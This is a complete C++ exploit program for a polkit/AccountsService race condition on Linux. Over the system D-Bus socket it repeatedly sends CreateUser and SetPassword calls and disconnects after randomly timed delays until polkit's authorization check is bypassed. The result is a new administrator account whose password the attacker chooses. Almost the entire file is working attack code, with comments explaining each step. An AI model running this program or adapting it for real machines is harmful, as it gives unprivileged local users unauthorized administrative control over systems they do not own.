#include "dbus_utils.hpp"
#include "dbus_auth.hpp"
#include "parse.hpp"
#include "utils.hpp"
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <crypt.h>
#include <errno.h>
#include <spawn.h>
#include <signal.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <cstdint>
#include <functional>
#include <memory>
#include <random>
#include <utility>
#include <assert.h>

// When we set the password, we also have to supply a hint. No privileges
// are required to ask for the password hint, so reading it back is a useful
// way to check whether we successfully set the password. (The hint will be
// an empty string if the password isn't set.)
//
// Both the pointer and the characters are const so this sentinel value
// cannot be reassigned by accident.
static const char* const passwordhint = "GoldenEye";

class DBusSocket : public AutoCloseFD {
public:
  DBusSocket(const uid_t uid, const char* filename) :
    AutoCloseFD(socket(AF_UNIX, SOCK_STREAM, 0))
  {
    if (get() < 0) {
      throw ErrorWithErrno("Could not create socket");
    }

    sockaddr_un address;
    memset(&address, 0, sizeof(address));
    address.sun_family = AF_UNIX;
    strcpy(address.sun_path, filename);

    if (connect(get(), (sockaddr*)(&address), sizeof(address)) < 0) {
      throw ErrorWithErrno("Could not connect socket");
    }

    dbus_sendauth(uid, get());

    dbus_send_hello(get());
    std::unique_ptr<DBusMessage> hello_reply1 = receive_dbus_message(get());
    std::string name = hello_reply1->getBody().getElement(0)->toString().getValue();
    std::unique_ptr<DBusMessage> hello_reply2 = receive_dbus_message(get());
  }
};

// Call org.freedesktop.Accounts.FindUserByName(username) on `fd` using the
// given serial number, then block until a reply arrives.
//
// Returns element 0 of the reply body as an object path. Throws Error when
// the reply is not a method return (for example, when the name is unknown).
static std::string send_accountsservice_FindUserByName(
  const int fd,
  const char* username,
  const uint32_t serialNumber
) {
  const char* const objectPath = "/org/freedesktop/Accounts";
  const char* const iface = "org.freedesktop.Accounts";
  const char* const dest = "org.freedesktop.Accounts";
  const char* const member = "FindUserByName";

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(DBusObjectString::mk(_s(username)))
    ),
    _s(objectPath),
    _s(iface),
    _s(dest),
    _s(member)
  );

  const std::unique_ptr<DBusMessage> response = receive_dbus_message(fd);
  const bool isReturn = response->getHeader_messageType() == MSGTYPE_METHOD_RETURN;
  if (!isReturn) {
    throw Error("FindUserByName returned an error.");
  }
  return response->getBody().getElement(0)->toPath().getValue();
}

// Check if an account with the given username already exists.
static std::string lookup_username(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  DBusSocket fd(uid, filename);
  return send_accountsservice_FindUserByName(fd.get(), username, 1001);
}

static bool username_exists(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  DBusSocket fd(uid, filename);
  try {
    send_accountsservice_FindUserByName(fd.get(), username, 1001);
  } catch(Error&) {
    return false;
  }
  return true;
}

// Send org.freedesktop.Accounts.CreateUser(username, username, 1) on `fd`
// with the given serial number. Does not wait for or read any reply.
// NOTE(review): per the AccountsService API the second argument is the full
// name and the int32 is the account type (1 = administrator). Confirm.
static void send_accountsservice_CreateUser(
  const int fd,
  const char* username,
  const uint32_t serialNumber
) {
  const char* const objectPath = "/org/freedesktop/Accounts";
  const char* const iface = "org.freedesktop.Accounts";
  const char* const dest = "org.freedesktop.Accounts";
  const char* const member = "CreateUser";

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(username)),  // user name
        DBusObjectString::mk(_s(username)),  // reused as the second string argument
        DBusObjectInt32::mk(1)
      )
    ),
    _s(objectPath),
    _s(iface),
    _s(dest),
    _s(member)
  );
}

// Record the amount of time it takes to get a response from the
// CreateUser method. The response will be an error because
// it will be denied by polkit. This response time gives us an upper
// bound on how long we need to wait before disconnecting when we
// attempt to trigger the bug.
static long record_time_CreateUser(
  const uid_t uid, const char* filename, const char* username
) {
  DBusSocket fd(uid, filename);

  // Start a timer.
  timespec starttime;
  clock_gettime(CLOCK_MONOTONIC, &starttime);

  send_accountsservice_CreateUser(fd.get(), username, 1001);
  receive_dbus_message(fd.get());

  // Stop the timer.
  timespec endtime;
  clock_gettime(CLOCK_MONOTONIC, &endtime);

  // Calculate the time difference.
  long diff =
    (1000000000 * (endtime.tv_sec - starttime.tv_sec)) +
    (endtime.tv_nsec - starttime.tv_nsec);

  return diff;
}

// This function calls the CreateUser method, but doesn't wait for the
// reply. Instead it disconnects from D-Bus after the specified number of
// nanoseconds. If we get lucky with the timing of the delay, it will
// hopefully trigger the bug and bypass polkit.
static void attempt_CreateUser_with_disconnect(
  const uid_t uid,
  const char* filename,
  const char* username,
  const long delay
) {
  DBusSocket fd(uid, filename);

  timespec duration;
  duration.tv_sec = delay / 1000000000;
  duration.tv_nsec = delay % 1000000000;

  send_accountsservice_CreateUser(fd.get(), username, 1001);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);

  // Returning from this function automatically disconnects us from D-Bus
  // because DBusSocket's destructor closes the file descriptor.
}

// Keep calling `attempt_CreateUser_with_disconnect` with random delays until
// the account exists, or give up.
//
// First measures a normal CreateUser round trip (`elapsed`). Each attempt's
// delay is then drawn uniformly from [0, 2*elapsed]. After every attempt,
// lookup_username checks whether the account has appeared.
//
// Returns the new account's object path. Throws Error after `maxAttempts`
// unsuccessful attempts.
static std::string exploit_CreateUser(
  const uid_t uid,
  const char* filename,
  const char* username
) {
  // If it doesn't succeed after this many attempts it probably isn't going
  // to work.
  const size_t maxAttempts = 1000;

  // First measure how long a regular CreateUser method call takes.
  const long elapsed =
    record_time_CreateUser(uid, filename, username);
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  for (size_t attempt = 1; attempt <= maxAttempts; attempt++) {
    const long delay = distrib(gen);
    attempt_CreateUser_with_disconnect(uid, filename, username, delay);
    try {
      // Check if the username has been created.
      std::string userpath = lookup_username(uid, filename, username);
      // `attempt` is a size_t, so it needs %zu (%ld expects a long). It is
      // 1-based, so a first-try success reports 1 iteration, not 0.
      printf(
        "Successfully created %s after %zu iterations,\n"
        "with a delay value of %ld nanoseconds\n",
        userpath.c_str(), attempt, delay
      );
      return userpath;
    } catch (Error&) {
      // Not created yet; try again with a new delay.
    }
  }

  throw Error("Failed to create new user account.");
}

// Send org.freedesktop.Accounts.User.SetPassword(password, passwordhint) to
// the account object at `userpath` on `fd`. Does not wait for or read any
// reply. `password` is forwarded unchanged; main passes a crypt(3) hash here.
static void send_accountsservice_SetPassword(
  const int fd,
  const char* userpath,
  const char* password,
  const uint32_t serialNumber
) {
  const char* const iface = "org.freedesktop.Accounts.User";
  const char* const dest = "org.freedesktop.Accounts";
  const char* const member = "SetPassword";

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(password)),
        DBusObjectString::mk(_s(passwordhint))
      )
    ),
    _s(userpath),
    _s(iface),
    _s(dest),
    _s(member)
  );
}

// Read the PasswordHint property of the account object at `userpath` through
// org.freedesktop.DBus.Properties.Get and block until the reply arrives.
// The hint is submitted together with the password by SetPassword, so it
// shows whether that call took effect.
//
// Returns the property value (a variant unwrapped to a string). Throws Error
// when the reply is not a method return.
static std::string send_accountsservice_GetPasswordHint(
  const int fd,
  const char* userpath,
  const uint32_t serialNumber
) {
  const char* const userIface = "org.freedesktop.Accounts.User";
  const char* const property = "PasswordHint";
  const char* const propsIface = "org.freedesktop.DBus.Properties";
  const char* const dest = "org.freedesktop.Accounts";
  const char* const member = "Get";

  dbus_method_call(
    fd,
    serialNumber,
    DBusMessageBody::mk(
      _vec<std::unique_ptr<DBusObject>>(
        DBusObjectString::mk(_s(userIface)),
        DBusObjectString::mk(_s(property))
      )
    ),
    _s(userpath),
    _s(propsIface),
    _s(dest),
    _s(member)
  );

  const std::unique_ptr<DBusMessage> response = receive_dbus_message(fd);
  if (response->getHeader_messageType() == MSGTYPE_METHOD_RETURN) {
    return response->getBody().getElement(0)->toVariant().getValue()->toString().getValue();
  }
  throw Error("GetPasswordHint returned an error.");
}

static bool has_passwordhint(
  const uid_t uid,
  const char* filename,
  const char* userpath
) {
  DBusSocket fd(uid, filename);
  std::string hint =
    send_accountsservice_GetPasswordHint(fd.get(), userpath, 1001);
  return strcmp(hint.c_str(), passwordhint) == 0;
}

// Record the amount of time it takes to get a response from the
// SetPassword method. The response will be an error because
// it will be denied by polkit. This response time gives us an upper
// bound on how long we need to wait before disconnecting when we
// attempt to trigger the bug.
static long record_time_SetPassword(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password
) {
  DBusSocket fd(uid, filename);

  // Start a timer.
  timespec starttime;
  clock_gettime(CLOCK_MONOTONIC, &starttime);

  send_accountsservice_SetPassword(fd.get(), userpath, password, 1001);
  receive_dbus_message(fd.get());

  // Stop the timer.
  timespec endtime;
  clock_gettime(CLOCK_MONOTONIC, &endtime);

  // Calculate the time difference.
  long diff =
    (1000000000 * (endtime.tv_sec - starttime.tv_sec)) +
    (endtime.tv_nsec - starttime.tv_nsec);

  return diff;
}

// This function calls the SetPassword method, but doesn't wait for the
// reply. Instead it disconnects from D-Bus after the specified number of
// nanoseconds. If we get lucky with the timing of the delay, it will
// hopefully trigger the bug and bypass polkit.
static void attempt_SetPassword_with_disconnect(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password,
  const long delay
) {
  DBusSocket fd(uid, filename);

  timespec duration;
  duration.tv_sec = delay / 1000000000;
  duration.tv_nsec = delay % 1000000000;

  send_accountsservice_SetPassword(fd.get(), userpath, password, 1001);
  clock_nanosleep(CLOCK_MONOTONIC, 0, &duration, 0);

  // Returning from this function automatically disconnects us from D-Bus
  // because DBusSocket's destructor closes the file descriptor.
}

// Keep trying `attempt_SetPassword_with_disconnect` with different
// delay values until the exploit succeeds (or we decide to give up).
static void exploit_SetPassword(
  const uid_t uid,
  const char* filename,
  const char* userpath,
  const char* password
) {
  // First measure how long a regular SetPassword method call takes.
  const long elapsed =
    record_time_SetPassword(uid, filename, userpath, password);
  printf("Elapsed time: %ld nanoseconds\n", elapsed);

  // Random number generator which will generate random
  // pause times in the range 0 .. 2*elapsed.
  std::random_device rd;
  std::mt19937 gen(rd());
  std::uniform_int_distribution<long> distrib(0, 2*elapsed);

  // If it doesn't succeed after 1000 attempts then it probably
  // isn't going to work.
  for (size_t i = 0; i < 1000; i++) {
    const long delay = distrib(gen);
    attempt_SetPassword_with_disconnect(uid, filename, userpath, password, delay);
    if (has_passwordhint(uid, filename, userpath)) {
      printf("Success!\n");
      return;
    }
  }

  throw Error("Failed to create new user account.");
}

// Entry point: main <unix socket path> <username> <password>
//
// Hashes the passphrase with crypt(3), refuses to continue if the username
// already exists, then creates the account and sets its password through
// exploit_CreateUser and exploit_SetPassword.
int main(int argc, char* argv[]) {
  const char* progname = argc > 0 ? argv[0] : "a.out";
  if (argc != 4) {
    fprintf(
      stderr,
      "usage:   %s <unix socket path> <username> <password>\n"
      "example: %s /var/run/dbus/system_bus_socket boris iaminvincible\n",
      progname,
      progname
    );
    return EXIT_FAILURE;
  }

  const uid_t uid = getuid();
  const char* filename = argv[1];
  const char* username = argv[2];
  const char* passphrase = argv[3];

  // Convert the passphrase to a hash. The "$6$" prefix selects sha512crypt
  // (see crypt(5)).
  char salt[CRYPT_GENSALT_OUTPUT_SIZE] = {};
  struct crypt_data cryptdata = {};
  if (crypt_gensalt_rn("$6$", 0, 0, 0, salt, sizeof(salt)) == nullptr) {
    perror("crypt_gensalt_rn");
    return EXIT_FAILURE;
  }
  // On failure crypt_r returns either NULL or an invalid hash beginning with
  // '*', depending on how libcrypt was built. Without this check, that
  // unusable string would be submitted as the password.
  const char* const hashed = crypt_r(passphrase, salt, &cryptdata);
  if (hashed == nullptr || hashed[0] == '*') {
    perror("crypt_r");
    return EXIT_FAILURE;
  }
  const char* password = cryptdata.output;

  if (username_exists(uid, filename, username)) {
    fprintf(
      stderr,
      "Error: username %s already exists.\n"
      "Please try again with a different username.\n",
      username
    );
    return EXIT_FAILURE;
  }

  std::string userpath = exploit_CreateUser(uid, filename, username);
  exploit_SetPassword(uid, filename, userpath.c_str(), password);

  return EXIT_SUCCESS;
}
